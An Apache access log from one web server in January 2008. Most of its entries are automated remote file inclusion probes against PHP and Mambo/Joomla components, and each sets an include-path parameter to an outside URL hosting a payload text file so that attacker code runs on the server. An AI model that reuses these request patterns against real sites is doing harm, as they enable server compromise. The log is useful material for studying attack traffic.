210.240.50.2 - - [13/Jan/2008:08:14:44 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:14:44 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:14:45 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:14:55 -0800] "GET /logs/access_071225.log//?CONFIG_EXT[LIB_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.201.28.140 - - [13/Jan/2008:08:15:11 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
74.6.8.71 - - [13/Jan/2008:08:15:16 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.128.204.2 - - [13/Jan/2008:08:15:35 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:16:27 -0800] "GET /logs/access_071225.log/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:16:58 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:16:59 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:16:59 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:17:22 -0800] "GET /logs/access_071229.log/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:17:23 -0800] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:17:23 -0800] "GET /logs/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:18:20 -0800] "GET /logs/access_071229.log//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:18:21 -0800] "GET //?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:18:21 -0800] "GET /logs//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 29972 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:18:26 -0800] "GET /logs/access_071214.log/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:19:23 -0800] "GET /logs/access_071214.log//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:19:43 -0800] "GET /logs/access_071225.log//?CONFIG_EXT[LIB_DIR]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:22:08 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:22:42 -0800] "GET /logs/access_071225.log/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:24:27 -0800] "GET /logs/access_071229.log/?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:24:28 -0800] "GET /?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:24:28 -0800] "GET /logs/?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 200 29967 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:24:42 -0800] "GET /logs/access_071229.log/registration_detailed.inc.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:24:42 -0800] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:24:43 -0800] "GET /logs/registration_detailed.inc.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:24:52 -0800] "GET /logs/access_071229.log//?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:24:53 -0800] "GET //?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:24:53 -0800] "GET /logs//?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 200 29972 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:26:04 -0800] "GET /logs/access_071214.log/registration_detailed.inc.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:26:28 -0800] "GET /logs/access_071214.log//?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:29:06 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.73.200.244 - - [13/Jan/2008:08:31:01 -0800] "GET /logs//login.php?dir=http://slackche.hit.bg/test2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
217.73.200.244 - - [13/Jan/2008:08:31:05 -0800] "GET //login.php?dir=http://slackche.hit.bg/test2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:18 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:18 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:18 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:19 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:19 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:19 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:19 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:19 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:19 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:19 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.fastmodding.com//shop/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:19 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.fastmodding.com//shop/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:20 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.fastmodding.com//shop/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:20 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:20 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:20 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:21 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:21 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:08:32:21 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:32:26 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:32:26 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:32:26 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:08:32:37 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:08:32:37 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:08:32:37 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.76.186.87 - - [13/Jan/2008:08:33:13 -0800] "GET /logs/access_071229.log/modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [13/Jan/2008:08:33:20 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:24 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gulvtech.no/gulvtech/bilder/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:25 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gulvtech.no/gulvtech/bilder/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:25 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gulvtech.no/gulvtech/bilder/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:26 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:27 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:27 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:28 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:29 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:29 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:29 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:30 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:30 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:30 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arkitektsolli.no//script/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:30 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arkitektsolli.no//script/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:31 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:31 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arkitektsolli.no//script/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:31 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arkitektsolli.no//script/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:31 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:31 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:31 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arkitektsolli.no//script/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:08:33:32 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arkitektsolli.no//script/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.87.96.4 - - [13/Jan/2008:08:33:44 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.87.96.4 - - [13/Jan/2008:08:33:44 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.87.96.4 - - [13/Jan/2008:08:33:45 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.87.96.4 - - [13/Jan/2008:08:33:45 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.87.96.4 - - [13/Jan/2008:08:33:45 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.87.96.4 - - [13/Jan/2008:08:33:45 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.157.91 - - [13/Jan/2008:08:36:09 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.157.91 - - [13/Jan/2008:08:36:09 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.157.91 - - [13/Jan/2008:08:36:10 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:38:20 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:38:24 -0800] "GET //skin/zero_vote/error.php?dir=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:38:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.65.96.182 - - [13/Jan/2008:08:38:56 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/ppl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.65.96.182 - - [13/Jan/2008:08:39:04 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/ppl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.110.136 - - [13/Jan/2008:08:40:01 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.65.96.182 - - [13/Jan/2008:08:40:54 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/ppl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.36 - - [13/Jan/2008:08:41:22 -0800] "GET /logs/access_071220.log/modules/xfsection/modify.php?dir_module=http://www.fabriziozingales.it//cic2/id_wav/.../fon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [13/Jan/2008:08:41:22 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.fabriziozingales.it//cic2/id_wav/.../fon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [13/Jan/2008:08:41:23 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.fabriziozingales.it//cic2/id_wav/.../fon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.17.110.136 - - [13/Jan/2008:08:41:24 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [13/Jan/2008:08:41:24 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [13/Jan/2008:08:41:25 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.168.205.154 - - [13/Jan/2008:08:41:39 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:41:44 -0800] "GET /logs/access_071222.log//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:41:45 -0800] "GET //?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:41:45 -0800] "GET /logs//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 200 29972 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [13/Jan/2008:08:41:54 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [13/Jan/2008:08:41:55 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.110.136 - - [13/Jan/2008:08:42:22 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:42:32 -0800] "GET /logs/access_071205.log/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [13/Jan/2008:08:42:42 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
